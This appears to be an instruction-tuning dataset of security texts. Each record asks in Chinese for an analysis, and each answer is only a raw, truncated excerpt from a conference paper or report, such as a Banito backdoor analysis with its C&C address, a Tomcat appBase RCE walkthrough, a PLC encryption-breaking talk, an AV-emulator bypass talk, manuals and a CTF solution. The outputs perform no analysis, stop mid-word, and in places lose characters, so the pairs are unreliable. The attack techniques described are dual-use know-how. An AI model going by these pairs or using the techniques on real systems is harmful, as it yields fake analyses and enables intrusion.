{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnalysis Report Sample 172AED81C4FDE1CF23F1615ACEDFAD65 Author Marion Marschalek [marion-m@live.at] Date 24/03/2013 Abstract The analyzed sample, detected as Backdoor.Win32.Banito, is multi-threaded malware that infects files on the disk, communicates to a remote server under the domain ns.dns3-domain.com and provides extended spying and system control functionalities. Its code is obfuscated and it implements a row of anti- analysis measures. It was in-the-wild around late 2010 / early 2011 and its origins are believed to be Chinese. 1 | P a g e Summary The analyzed sample is a tricky piece of malware that replicates itself and communicates to a remote Command & Control server (C&C). It is a non-polymorphic file infector, replacing executable images in the file system with a copy of itself, but still hiding and starting the original applications when needed. It implements various anti-analysis measures, as for example invoking intentional exceptions or checking for the dwFlags value of the GetStartupInfo() API call. It implements a huge amount of junk code and is highly obfuscated. It is implemented in object oriented C++ and makes heavy usage of virtual function calls that make analysis significantly harder than usual. Besides the sample constructs an API offset jump table on startup, which is used throughout execution for resolution of system calls. The malware is designed as multi-threaded application that divides process control, file infection and sending and receiving messages to and from the C&C server in different threads to share execution load. The communication to the remote server is handled via one single domain which is hard coded in the sample. The domain is ns.dns3-domain.com, the according network address is 125.34.39.47. The server is believed to be out of operation, as it does not answer to any message of the analyzed sample. The malwares capabilities are extensive, it is able to spy on the system as well as control system operation. It can produc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Tomcat中的appBase 第次看有关tomcat appBase是在漏洞百出-个Jolokia RCE的新利式中 该后续就展示出了可以直接在新建的vhost中访问/etc/paasswd等件资源已经跳出 TOCMAT/webapps的限制并且在其他漏洞中也到了对appBase这属性的利当时中就有 些疑问为什么appBase这属性就可以控制TOMCAT相关资源位置是什么机制让其实时效 现在就在此中尝试从代码的度简单描述原理过程 tomcat分析版本10.0.18 先寻找appBase从何来 简单看到field的描述如下 简单排查appBase的引最重要的地在org.apache.catalina.core.StandardHost#getAppBaseFile appBase 因此利jolokia调可以直接创建个vhost指定/为appBase StandardHost 2 逻辑如上图较简单如果appBase不是绝对路径就进路径拼接算在TOMCAT根录下并将结 果赋值给appBaseFile最后返回 其实org.apache.catalina.core.StandardHost#getAppBaseFile的引很多但是致是两个向 1. context初始化对应ContextConfig 2. host初始化热部署对应HostConfig 这就暂且只看热部署相关 跟到org.apache.catalina.startup.HostConfig#deployApps() HostConfig 3 从上图的注释就能看出该函数于部署在application根录下的任何录或war件appBase所指 向的录就被视作application root并由此遍历appBase下的所有件将其路径存 filteredAppPaths中在此跟进deployDirectories如下 4 逻辑常简单只要是appBase录下名字不为WEB-INFMETA-INF的录就会经过 DeployDirectory的处理 注意这为了避免浪费资源已经处理过的录将会存cache只会处理不在cache中的新录 继续跟进org.apache.catalina.startup.HostConfig.DeployDirectory#run发现只是调了 org.apache.catalina.startup.HostConfig#deployDirectory该函数代码过就不截图了逻辑很简 单直接根据指定录新建了个StandardContext并将其加当前StandardHost之中此后就能够在 该StandardHost访问到对应的StandardContext了StandardContext直接对应appBase下的某个 录 5 简单来讲TOMCAT appBase初始指向的是 TOMCAT/webapps 然后将会部署webapps录下的所 有war件或者录并将其每个录作为StandardContext挂在当前StandardHost下最后客户端可 以通过 http://host:port/context_path 访问到已经部署的录 现在回到HostConfig#deployApps查找下引如下 可最终都是被HostConfig.lifecycleEvent其中start函数主要是在初始化Host的时候执的这 我们跟进check函数如下 如上图只要当前Host的autoDeploy属性为true时版本tomcat该属性默认为true最终都会调 deployApps函数此处就是热部署的具体实现了 继续查看HostConfig.lifecycleEvent如下 lifecycleEvent & backgroundProcess 6 如上图调check函数是需要接收到 Lifecycle.PERIODIC_EVENT 事件才会触发那么现在来全 局搜索下什么地才会发送这个事件 从命名来看从ContainerBase发出的事件不像是初始化时才会发的跟进去后发现是在 org.apache.catalina.core.ContainerBase#backgroundProcess函数中条件发送 Lifecycle.PERI ODIC_EVENT 事件其函数注释如下 7 显易这是个后台线程调的函数 初始化Host时定会触发部署为这时就会直接将appBase所指向录的录全部作为Context 加载到新Host中 tomcat运中并且版本默认autoDeploy为true时将会实时扫描appBase所指向的application root录然后为其新的录创建新的Context并加载到当前Host中这样就解释了某些利法直 接修改当前Host appBase后将可以跳出webapp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYoure Just Complaining Because Youre Guilty: A DEF CON Guide to Adversarial Testing of Software Used in the Criminal Justice System August 11, 2018 - DEF CON 26 Jeanna Matthews, PhD - Clarkson University/Data and Society Nathan Adams - Forensic Bioinformatic Services Jerome D. Greco, Esq. - Legal Aid Society of NYC Motivation/overview of the problem Black box decision making  Software is increasingly used to make important decisions about peoples lives  Hiring, housing, how we make friends, find partners, navigate city streets, get our news,   The weightier the decision the more crucial it is that we understand and can question it  What input is used to make the decision? Is it correct? Do we have other information that should be considered?  Are protected attributes like race and gender used? What about proxies for those characteristics?  Criminal justice system  Software/algorithmic decision making used increasingly throughout the criminal justice system  Often black boxes for which trade secret protection is claimed to be more important than rights of individual defendants or citizens to understand the decisions  Evidence of problems  How can we find bugs and fix problems if the answer is always you cant question and you are just complaining because you are guilty? Can you imagine...  Being sent to prison rather than given probation because proprietary software says you are likely to commit another crime?  But you cant ask how the software makes its decisions. (Eric Loomis)  Having the primary evidence against you being the results of DNA software?  But one program says you did it and another says you didnt. (Nick Hillary)  Being accused of murder solely because of DNA transferred by paramedics?  But they dont figure that out for months. (Lukis Anderson)  Software and complex systems need an iterative process of debugging and improvement!  Anyone who has used technology knows that there are glitches and bugs and unintended consequences!  Anyone who builds technol", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.LIFARS.com info@lifars.com 2022 SecurityScorecard Inc. 244 Fifth Avenue, Suite 2035, New York, NY 10001 1.212.222.7061 Prepared by: Vlad Pasca, LIFARS, LLC Date: 02/14/2022 A Detailed Analysis of The LockBit Ransomware www.LIFARS.com | 1 Table of Contents Executive Summary .............................................................................................................. 2 Analysis and Findings .......................................................................................................... 2 Thread activity  sub_4DF310 function ........................................................................ 10 Thread activity  sub_4C3430 function ....................................................................... 14 Thread activity  sub_4A2EC0 function ....................................................................... 19 Thread activity  sub_45C960 function....................................................................... 28 Thread activity  sub_497060 function ....................................................................... 34 Thread activity  sub_49E730 function ....................................................................... 39 Printing ransom notes ...................................................................................................... 44 LockBit Wallpaper Setup ................................................................................................. 46 Extract and save the HTA ransom note to Desktop .............................................. 52 Indicators of Compromise ............................................................................................... 59 Registry Keys ................................................................................................................................................................................... 59 Files Created ........................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSHODAN for Penetration Testers Michael theprez98 Schearer SHODAN for Penetration Testers  What is SHODAN?  Basic Operations  Penetration Testing  Case Study 1: Cisco Devices  Case Study 2: Default Passwords  Case Study 3: Infrastructure Exploitation  Other Examples  The Future  Conclusions By pen testing, I mean  Black/gray/white box testing  Ethical hacking  Security auditing  Vulnerability assessment  Standards compliance  Training  All of the above WHAT IS SHODAN? SHODAN for Penetration Testers What is SHODAN? (1)  SHODAN (http://www.shodanhq.com/) is a computer search engine designed by web developer John Matherly (http://twitter.com/achillean)  While SHODAN is a search engine, it is much different than content search engines like Google, Yahoo or Bing What is SHODAN? (2)  Typical search engines crawl for data on web pages and then index it for searching  SHODAN interrogates ports and grabs the resulting banners, then indexes the banners (rather than the web content) for searching What is SHODAN? (3)  Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners  Optimizing search results requires some basic knowledge of banners BASIC OPERATIONS SHODAN for Penetration Testers SHODAN Helper Firefox Add- on SHODAN Search Provider Firefox Add-on Basic Operations: Search  Search terms are entered into a text box (seen below)  Quotation marks can narrow a search  Boolean operators + and  can be used to include and exclude query terms (+ is implicit default) Basic Operations: Login  Create and login using a SHODAN account; or  Login using one of several other options (Google, Twitter, Yahoo, AOL, Facebook, OpenID  Login is not required, but country and net filters are not available unless you login  Export requires you to be logged in Basic Operations: Filters  country: filters results by two letter country code  hostname: f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDirty Little Secrets of Information Security Why we might not be doing as well as you would hope. Bruce Potter (gdead@shmoo.com) 1 Dont Believe Anything I Say  Every person who has mastered a profession is a skeptic concerning it. - George Bernard Shaw  Authority has every reason to fear the skeptic, for authority can rarely survive in the face of doubt - Robert Lindner  Security is all about not trusting what you are hearing, seeing, or being sent to you  As true in meatspace as in teh tubes  By Day, Senior Associate for Booz Allen Hamilton  Wireless Security, application assurance, information security strategy  By Night, Founder of The Shmoo Group 2 Whats happening here?  The goal of this talk is to call out some of the 800lbs gorillas in the room  The security industry is riddled with them, and sometimes theyre called out in non-productive ways  Id like to address them head on... and actually do something useful with our jobs  NOTE: Much of what is in this presentation you will probably disagree with. Also, much of what is in this presentation is my opinion and analysis based on what can loosely be called research. Feel free to throw stones. 3 Lets have some structure to our discussion IDS Patch Mgt Policies & Procedures Firewalls AAA Services Software ACLs Software Sec Honey pots Sophistication and Operational Cost Operations (IT) Network Software Operations (Security) Academic / Emerging 4 What gave birth to the 800lbz Gorillaz?  The security community as evolved dramatically over the last several decades  Initially a small group of computer scientists in the 60s ran a small, academic group of computers 1960 1970 1980 1990 2000 Unix Developed Tubes! Computers with Tubes! ARPANet starts 5 What gave birth to the 800lbz Gorillaz?  Things got serious in the 70s  Telnet was introduced  A great deal of research on trusted systems was performed  Blueboxing was born 1960 1970 1980 1990 2000 Unix Developed Tubes! Computers with Tubes! ARPANet starts Captn Crunch Whistl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe spear to break the security wall of S7CommPlus CHENG LEI , NSFOCUS Related Work  Dillon Beresford. Exploiting Siemens Simatic S7 PLCs. Black Hat 2011 USA. S7Comm protocol  Ralf Spenneberg et. al. PLC-Blaster: A Worm Living Solely in the PLC. Black Hat 2016 USA Early S7CommPlus protocol  This talk mainly focus on the current encrypted S7CommPlus protocol Programmable Logic Controllers (PLC) is responsible for process control in industrial control system. A PLC contains a Central Processing Unit (CPU), some digital/analog inputs and outputs modules, communication module and some process modules like PID. What is PLC S7-300  S7-200,S7-300,S7-400 using the S7Comm protocol S7-1500 S7-1200  S7-1200v3.0 using the early S7CommPlus protocol  S7-1200v4.0, S7-1500 using the current encrypted S7CommPlus protocol Siemens PLCs TIA Portal is the configuration and programming software for Siemens PLCs. TIA Portal Replay Attack  Replay attacks have been widely used in PLC attacks.  Get the communication sequence packets with the help of Wireshark S7CommPlus Protocol  The current S7CommPlus protocol including the S7CommPlus Connection packets and S7CommPlus Function packets has a similar structure.  1. First Connection Setup Request  2. Frist Connection Setup Response  3.Second Connection Setup Request  4.Function PacketStop PLC S7CommPlus Protocol  Session ID Session ID = Object ID+0x80 S7CommPlus Protocol  Encryption Part 1. The second connection packet has two encryptions 2. The function packet has one encryptionIntegrity Part Fun with the Encryption  Using reverse debugging techniques, we found these encryption is calculated by TIA Portal through a file named OMSp_core_managed.dll 1. Connection packet encryption Input parameter for this encryption is a random value array generated by the PLC in the first connection response packet. Fun with the Encryption 1 First encryption in the connection packet Using XOR (we call this Encryption1), the first encryption can be calculated w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.2 $ .TH \"PSQL\" \"1\" \"2003-11-02\" \"Application\" \"PostgreSQL Client Applications\" .SH NAME psql \\- PostgreSQL 交互终端 .SH SYNOPSIS .sp \\fBpsql\\fR\\fR [\\fR\\fB\\fIoption\\fB\\fR...\\fB\\fR\\fR]\\fR\\fR [\\fR\\fB\\fIdbname\\fB\\fR [\\fB\\fIusername\\fB\\fR]\\fB\\fR\\fR]\\fR .SH \"DESCRIPTION 描述\" .PP \\fBpsql\\fR 是一个以终端为基础的 PostgreSQL 前端它允许你交互地键入查询把它们发出给 PostgreSQL 然后看看查询的结果另外输入可以来自一个文件还有 它提供了一些元命令和多种类 shell 地特性来实现书写脚本以及对大量任务的自动化 .SH \"OPTIONS 选项\" .TP \\fB-a\\fR .TP \\fB--echo-all\\fR 在读取行时向屏幕打印所有内容 这个选项在脚本处理时比交互模式时更有用这个选项等效于设置变量 ECHO 为 all .TP \\fB-A\\fR .TP \\fB--no-align\\fR 切换为非对齐输出模式缺省输出模式是对齐的 .TP \\fB-c\\fIcommand\\fB\\fR .TP \\fB--command\\fIcommand\\fB\\fR 声明 psql 将执行一条查询字串 command然后退出这一点在 shell 脚本里很有用 \\fIcommand\\fR 必须是一条完全可以被服务器分析的查询字串也就是说它不包含 psql特有的特性 或者是一个反斜杠命令这样你就不会混合 SQL 和 psql 元命令要想混合使用你可以把字串定向到\\fBpsql\\fR 里象这样 echo \"\\\\x\\\\ select * from foo;\" | psql 如果命令字串包含多个 SQL 命令那么他们在一个事务里处理 除非在字串里包含了明确的 BEGIN/COMMIT 命令把他们分成多个事务 这个和从 psql 的标准输入里给它填充相同字串不同 .TP \\fB-d\\fIdbname\\fB\\fR .TP \\fB--dbname\\fIdbname\\fB\\fR 声明想要联接的数据库名称等效于在命令行行上把 dbname 声明为第一个非选项参数 .TP \\fB-e\\fR .TP \\fB--echo-queries\\fR 显示所由发送给服务器的查询 等效于把变量 ECHO 设置为 queries .TP \\fB-E\\fR .TP \\fB--echo-hidden\\fR 回显由\\fB\\\\d\\fR 和其他反斜杠命令生成的实际查询 如果你希望在你自己的程序里包含类似的功能 你就可以使用这个选项这等效于在psql里设置变量ECHO_HIDDEN .TP \\fB-f\\fIfilename\\fB\\fR .TP \\fB--file\\fIfilename\\fB\\fR 使用 filename作为命令的语句源而不是交互式读入查询 在处理完文件后psql 结束这个选项在很多方面等效于内部命令\\fB\\\\i\\fR 如果\\fIfilename\\fR 是\\- 连字符则从标准输入读取 使用这个选项与用 psql < filename 有微小的区别通常两者都回按照你预期那样运行但是使用 -f打开了一些很好的特性 比如带行号的错误信息而且使用这个选项还有可能有减小启动负荷的机会 另一方面如果你把所有内容手工输入 使用 shell 输入定向的方式理论上能保证生成和你已经得到的完全一样的输出译注重复运行命令 .TP \\fB-F\\fIseparator\\fB\\fR .TP \\fB--field-separator\\fIseparator\\fB\\fR 使用 separator 作为域分隔符等效于 \\fB\\\\pset fieldsep\\fR 或\\fB\\\\f\\fR .TP \\fB-h\\fIhostname\\fB\\fR .TP \\fB--host\\fIhostname\\fB\\fR 声明正在运行服务器的主机名 如果主机名以斜扛开头则它被用做到 Unix 域套接字的路径 .TP \\fB-H\\fR .TP \\fB--html\\fR 打开HTML格式输出等效于\\\\pset format html 或\\fB\\\\H\\fR 命令 .TP \\fB-l\\fR .TP \\fB--list\\fR 列出所有可用的数据库然后退出其他非联接选项将被忽略类似于内部命令 \\fB\\\\list\\fR .TP \\fB-o\\fIfilename\\fB\\fR .T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON CHINA 1.0 BADGE hacking workshop joe Grand aka kingpin informal environment a deeper look into the badge setup development environment modify/recompile CODE open lab workshop goals complete tasks, get rewarded 4 roots and 4 branches, each with 4 leds when task is complete, badge inserted into programmer to unlock LED when each root is complete, magic happens when all roots are complete, even magic happens gameplay Hardware USB POWER LED control ACCELEROMETER mcu FPC block diagram test test test Schematic USB INTERFACE allows for arduino programming and interactive mode FT231X USB-to-Serial UART entire usb protocol handled on-chip host will recognize as virtual serial device/com port mosfets for soft-start and power switchover led matrix multiplexing via led matrix library row controlled by discrete i/O column controlled through 74hc595 shift register refresh @ 175hz to reduce flicker each led individually addressable, dimmable (16 levels) accelerometer ST microelectronics LIS3DH 3-axis digital output (i2c/SPI) +/- 2, 4, 8, 16g range interrupt on motion or free fall used to preserve battery life sleep mode @ 10 seconds of inactivity Raw values available through interactive mode edge connector as interface to the outside world UART, I2C, AVR ICSP used with programming shield to set/read state of badge leds FLEXIBLE PRINTED CIRCUIT (FPC) pin 1 pin 12 1.GND 2.SCK 3.MISO 4.MOSI 5./RST 6.SDA 7.SCL 8.SIN 9.SOUT 10./SEN SE 11.GPIO 12.VCC bill-of-materials ARDUINO open source platform based on easy-to-use hw/sw/FW worldwide community of users/contributors 90% of FLash (27.6kB), 43% of RAM (887 bytes) loop set power state (battery, usb, usb charger) check for/process interactive mode check for/process fpc communication update leds sleep until accelerometer interrupt Firmware led matrix Add #define swap() to .cpp to prevent compiling error Remove #defines for DIO2 pinMode and digitalWrite conflicted with my core code arduino cheat sheet arduino ide cross platform (windo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlinkie Lights! Network Monitoring with Arduino Steve Ocepek Copyright Trustwave 2010 Confidential Disclaimer Due to legal concerns, slides containing one or more of the following have been removed:  Depictions of violence  Dancing animals  Transvestites  Questionable remains of biological origin  Drunk people  Copyrighted images LEGAL APPROVED* * subject to terms and conditions Copyright Trustwave 2010 Confidential Early Market Trends * not affiliated with Diamond Multimedia or its subsidiaries Copyright Trustwave 2010 Confidential Industry Progression * smoking Cloud may be hazardous to your health. Copyright Trustwave 2010 Confidential Realization  I dont know what the hell my box is doing anymore  I dont know what normal looks like  2 minute pcap file > 2 minute MP3  My netstat hurts Copyright Trustwave 2010 Confidential The Activity Light is Solid Copyright Trustwave 2010 Confidential Third Party Analysis * any resemblance to real persons, living or dead is purely coincidental. Copyright Trustwave 2010 Confidential Wait, monitoring? #1: You mean like IDS, IPS, NAC, sniffers, scrapers, log monitors, and the theory of Atlantis? #2: No, I mean like wtf is my box doing? #1: Yeah try wireshark noob #2: Just because I am a genetically enhanced 3-month-old is no reason to make this personal. Besides wireshark is for analysis, not monitoring. #3: Can you guys keep it down? This 2-person escape pod is bad enough without your 21st century era IT debate reenactments. Copyright Trustwave 2010 Confidential Something else  Like the old days, the activity lights on modems and stuff  Something that makes a good excuse for Arduino and sounds good on a Defcon schedule  And has freaking blinkie lights  Something that provides visibility Copyright Trustwave 2010 Confidential Visibility vs. Visualization  Going for something thats more peripheral, tap into human cognition  Making up my own distinctions here  Visualization  Tends to be complex, static image that we stare at  Visibil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# LoadSomeBits Forensics, 500 points ## Description: > Can you find the flag encoded inside this image? ![logo](images/pico2018-special-logo.bmp) ## Solution: Couldn't find the flag by using any existing Steganography tool (e.g. zsteg, StegSolve). I ended up writing this script which skips the BMP header and then creates a payload byte from the LSB of each 8 consecutive image bytes: ```python import os import mmap BMP_HEADER_SIZE = 54 BITS_PER_BYTE = 8 def memory_map(filename, access=mmap.ACCESS_READ): size = os.path.getsize(filename) fd = os.open(filename, os.O_RDWR) return mmap.mmap(fd, size, access=access) with memory_map(\"pico2018-special-logo.bmp\") as b: for i in range(BMP_HEADER_SIZE, len(b) - BMP_HEADER_SIZE - BITS_PER_BYTE, BITS_PER_BYTE): chunk = b[i:i+BITS_PER_BYTE] new_byte = 0 for x, byte in enumerate(chunk): new_byte |= (byte & 0x01) << (BITS_PER_BYTE - x - 1) c = chr(new_byte) if new_byte == 0: break print (c, end='') ``` The output: ``` $ python3 solve.py picoCTF{st0r3d_iN_tH3_l345t_s1gn1f1c4nT_b1t5_882756901} ``` The flag: picoCTF{st0r3d_iN_tH3_l345t_s1gn1f1c4nT_b1t5_882756901}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHadoop: Apaches Open Source Implementation of Googles MapReduce Framework Hacked Existence Team Joey Calca & Ryan Anguiano http://hackedexistence.com Cloud Computing  Clouds are big piles of other peoples machines, plus virtualization  Remote  Scalable  Virtual  High Level API  Course Grain data processed in parallel Courtesy Stanzione, Sannier, and Santanam, Arizona State University How much data?  Wayback Machine has 2 PB + 20 TB/month (2006)  Google processes 20 PB a day (2008)  all words ever spoken by human being ~ 5 EB  NOAA has ~ 1PB climate data (2007)  CERNs :HC will generate 15 PB a year (2008) Stats from The iSchool University of Maryland Saguaro Cluster Research Group High Performance Computing Initiative Department Fulton School Primary Application Various # of Processor Cores 4560 Processor Architechture Intel Xeon Interconnect InfiniBand Memory 10240 GB (Total) Storage 215 TB OS CentOS 5.3 Sys Admin Contact Douglas Fuller Googles Map/Reduce Google 2004 at The Sixth Symposium on Operating System Design and Implementation Processing and Generating large data sets Many real world tasks are expressible in this model Automatically parallelized for a large cluster of commodity machines Googles Map/Reduce Input -> Mapper -> Intermediate <key/value> Pairs -> Reducer -> Output Easy to utilize resources of large distributed system without any experience Highly scalable: typically processes many terabytes of data in parallel Upwards of 1,000 MapReduce jobs are executed on Googles clusters daily  Apache Projects Open Source Implementation of MapReduce  JAVA Based  Hadoop has been demonstrated on clusters with 2000 nodes. The current design target is 10,000 node clusters.  http://hadoop.apache.org Mapper  Map is a special function that applies the function f to each element in the list  Map[f,(1,2,3,4,5)] -> {f[1],f[2],f[3],f[4],f[5]} 1 2 3 4 5 sq 1 2 3 4 5 sq sq sq sq 1 sq 4 9 16 25 sq sq sq sq Mapper  Input:  The Entire Data Set  Maps all the input values to a ke", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsed === 功能强大的流式文本编辑器 ## 补充说明 **sed** 是一种流编辑器它是文本处理中非常重要的工具能够完美的配合正则表达式使用功能不同凡响处理时把当前处理的行存储在临时缓冲区中称为模式空间pattern space接着用sed命令处理缓冲区中的内容处理完成后把缓冲区的内容送往屏幕接着处理下一行这样不断重复直到文件末尾文件内容并没有 改变除非你使用重定向存储输出Sed主要用来自动编辑一个或多个文件简化对文件的反复操作编写转换程序等 ## sed的选项命令替换标记 **命令格式** ```shell sed [options] 'command' file(s) sed [options] -f scriptfile file(s) ``` ### 选项 ```shell -e<script>或--expression=<script>以选项中的指定的script来处理输入的文本文件 -f<script文件>或--file=<script文件>以选项中指定的script文件来处理输入的文本文件 -h或--help显示帮助 -n或--quiet或silent仅显示script处理后的结果 -V或--version显示版本信息 ``` ### 参数 文件指定待处理的文本文件列表 ### sed命令 ```shell a\\ # 在当前行下面插入文本 i\\ # 在当前行上面插入文本 c\\ # 把选定的行改为新的文本 d # 删除删除选择的行 D # 删除模板块的第一行 s # 替换指定字符 h # 拷贝模板块的内容到内存中的缓冲区 H # 追加模板块的内容到内存中的缓冲区 g # 获得内存缓冲区的内容并替代当前模板块中的文本 G # 获得内存缓冲区的内容并追加到当前模板块文本的后面 l # 列表不能打印字符的清单 n # 读取下一个输入行用下一个命令处理新的行而不是用第一个命令 N # 追加下一个输入行到模板块后面并在二者间嵌入一个新行改变当前行号码 p # 打印模板块的行 P # (大写) 打印模板块的第一行 q # 退出Sed b lable # 分支到脚本中带有标记的地方如果分支不存在则分支到脚本的末尾 r file # 从file中读行 t label # if分支从最后一行开始条件一旦满足或者Tt命令将导致分支到带有标号的命令处或者到脚本的末尾 T label # 错误分支从最后一行开始一旦发生错误或者Tt命令将导致分支到带有标号的命令处或者到脚本的末尾 w file # 写并追加模板块到file末尾 W file # 写并追加模板块的第一行到file末尾 ! # 表示后面的命令对所有没有被选定的行发生作用 = # 打印当前行号码 # # 把注释扩展到下一个换行符以前 ``` ### sed替换标记 ```shell g # 表示行内全面替换 p # 表示打印行 w # 表示把行写入一个文件 x # 表示互换模板块中的文本和缓冲区中的文本 y # 表示把一个字符翻译为另外的字符但是不用于正则表达式 \\1 # 子串匹配标记 & # 已匹配字符串标记 ``` ### sed元字符集 ```shell  # 匹配行开始如/sed/匹配所有以sed开头的行 $ # 匹配行结束如/sed$/匹配所有以sed结尾的行 . # 匹配一个非换行符的任意字符如/s.d/匹配s后接一个任意字符最后是d * # 匹配0个或多个字符如/*sed/匹配所有模板是一个或多个空格后紧跟sed的行 [] # 匹配一个指定范围内的字符如/[sS]ed/匹配sed和Sed [] # 匹配一个不在指定范围内的字符如/[A-RT-Z]ed/匹配不包含A-R和T-Z的一个字母开头紧跟ed的行 \\(..\\) # 匹配子串保存匹配的字符如s/\\(love\\)able/\\1rsloveable被替换成lovers & # 保存搜索字符用来替换其他字符如s/love/ **&** /love这成 **love**  \\< # 匹配单词的开始如:/\\<love/匹配包含以love开头的单词的行 \\> # 匹配单词的结束如/love\\>/匹配包含以love结尾的单词的行 x\\{m\\} # 重复字符xm次如/0\\{5\\}/匹配包含5个0的行 x\\{m,\\} # 重复字符x至少m次如/0\\{5,\\}/匹配至少有5个0的行 x\\{m,n\\} # 重复字符x至少m次不多于n次如/0\\{5,10\\}/匹配5~10个0的行 ``` ## sed用法实例 ### 替换操作s命令 替换文本中的字符串 ```shell sed 's/book/books/' file ``` **-n选项** 和 **p命令** 一起使用表示只打印那些发生替换的行 sed -n 's/test/T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Exploitation Techniques: Breaking AV-Emulator XCon2016/by nEINEI Who is @nEINEI  nEINEI - neineit@gmail.com  Security researcher / software developer /reverse engineer  http://www.vxjump.net  Research interests  Vulnerability, Advanced Exploitation Techniques ,NIPS/HIPS  Complexity Virus/Reverse engineering/Advanced Threat   Agenda  AV-Emulator Architecture and Implementation  Background  AV-Emulator detection techniques  Advanced Techniques On AV-Emulator Bypass  Process stack information inspection  C++ advanced syntactic features  Randomized conditional branch generation  ROP simulation  DLL forwarding  Exploiting Windows memory heap management  AV-Emulator Bypass Mitigation AV-Emulator Architecture and Implementation  AV-Emulator Background  Evolved virus polymorphism & metamorphism  Complex PE packers  malicious code behavior analysis Host Decryption Poly Engine Virus RAM Decryption Poly Engine Virus AV-Emulator Architecture and Implementation  If it is an PE unpacker?  AV-Emulator is far beyond a simple instruction simulator, it is currently implemented as a whole package(OS simulation, hardware simulation, etc). AV-Emulator Architecture and Implementation  If it is an PE packer? NO  Intel CPU simulation  Opcode identification  Addressing mode  Instruction analysis system  Hardware simulationHDD ,memoryNIC  Windows OS Simulation  PE loader  Memory management  Task scheduler  API simulating  File system  Registry system  Exception handlers  Thread , process  Debugging system  GUI system   AV-Emulator Architecture and Implementation  CPU simulation methods  Instruction simulationused in most AV-emulators)  Instruction translation based on opcode, line-by-line parsing  Inefficiency, monitor each instruction    Dynamic translationQEMU  Translate the opcode into intermediate code and interpretive execution  Fastbut the encryption and self-modification of malicious code results in multiple translations    Real Environment  Isolated spacemalicious code execu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDavid Rook The Security Risks of Web 2.0 DefCon 17, Las Vegas Agenda  A quick Web 2.0 definition  The differences between Web 1.0 and Web 2.0  Common Web 2.0 security vulnerabilities  The differences between Web 1.0 and Web 2.0 vulnerabilities  Security analysis difficulties with Web 2.0  How to prevent these vulnerabilities if (slide == introduction) System.out.println(Im David Rook);  Security Analyst, Realex Payments, Ireland CISSP, CISA, GCIH and many other acronyms  Security Ninja (www.securityninja.co.uk)  Secure Development (www.securedevelopment.co.uk)  OWASP contributor and presenter  IIA Web Development Working Group  Facebook hacker and published security author (insecure magazine, bloginfosec etc) About this Presentation  What this presentation isnt  A technical discussion about Web 2.0 technologies/architectures  No 0 days, new attacks or new vulnerabilities  Just a discussion about XSS and SQL Injection  What this presentation is:  A look at Web 2.0 app vulnerabilities  How they differ (or not) from Web 1.0  How to prevent them A quick Web 2.0 definition  Web 2.0 is the business revolution in the computer industry caused by the move to the internet as a platform, and an attempt to understand the rules for success on that new platform. Chief among those rules is this: Build applications that harness network effects to get better the more people use them Tim OReilly - 2006 Rapid proliferation of content RSS Atom Everything can go online now Google Docs eyeOS Architecture of participation Soc Nets Youtube Writes data to local databases Gears HTML 5 User generated content Offline storage of data and state Desktop look and feel Syndication of content Key points about Web 2.0 Differences between Web 1.0 and 2.0 Category Web 1.0 Web 2.0 Functionality/Content Reading Content Creating Content Personal Websites Blogs and profiles Under Construction Sign BETA Technologies HTML, HTTP, HTTPS AJAX, JSON, SOAP, REST, XML, HTTP, HTTPS Synchronous Asynchronous Client-S", "category": "text_analysis", "source": "security_papers"}
